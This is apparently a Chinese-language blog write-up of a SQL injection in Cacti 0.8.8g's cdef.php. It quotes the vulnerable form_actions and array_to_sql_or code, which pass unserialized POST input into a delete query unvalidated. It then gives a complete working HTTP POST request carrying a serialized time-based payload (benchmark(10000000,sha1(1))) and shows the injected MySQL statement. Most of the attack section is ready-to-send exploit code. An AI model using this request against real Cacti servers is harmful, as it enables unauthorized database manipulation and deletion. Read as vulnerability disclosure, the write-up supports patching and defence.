cacti 0.8.8g cdef.php selected_items 存在sql注入

问题出现在文件cdef.php里面的form_actions函数里面

function form_actions() {
    global $colors, $cdef_actions;

    /* if we are to save this form, instead of display it */
    if (isset($_POST["selected_items"])) {
        $selected_items = unserialize(stripslashes($_POST["selected_items"]));

        if ($_POST["drp_action"] == "1") { /* delete */
            db_execute("delete from cdef where " . array_to_sql_or($selected_items, "id"));
            db_execute("delete from cdef_items where " . array_to_sql_or($selected_items, "cdef_id"));

        }elseif ($_POST["drp_action"] == "2") { /* duplicate */
            for ($i=0;($i<count($selected_items));$i++) {
                /* ================= input validation ================= */
                input_validate_input_number($selected_items[$i]);
                /* ==================================================== */

                duplicate_cdef($selected_items[$i], $_POST["title_format"]);
            }
        }

        header("Location: cdef.php");
        exit;
    }

跟进array_to_sql_or(),在/lib/database.php中发现了

function array_to_sql_or($array, $sql_column) {
    /* if the last item is null; pop it off */
    if ((empty($array{count($array)-1})) && (sizeof($array) > 1)) {
        array_pop($array);
    }

    if (count($array) > 0) {
        $sql_or = "($sql_column IN(";

        for ($i=0;($i<count($array));$i++) {
            if (is_array($array[$i]) && array_key_exists($sql_column, $array[$i])) {
                $sql_or .= (($i == 0) ? "'":",'") . $array[$i][$sql_column] . "'";
            } else {
                $sql_or .= (($i == 0) ? "'":",'") . $array[$i] . "'";
            }
        }

        $sql_or .= "))";

        return $sql_or;
    }
}
POST /cdef.php?action=actions HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Cacti=fvb36noraocv8etfbrvokrle81
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

selected_items=a:1:{i:0;s:31:"',benchmark(10000000,sha1(1)),'";}&drp_action=1 

实际Mysql执行的是

delete from cdef_items where (cdef_id IN('',benchmark(10000000,sha1(1)),''))

发表评论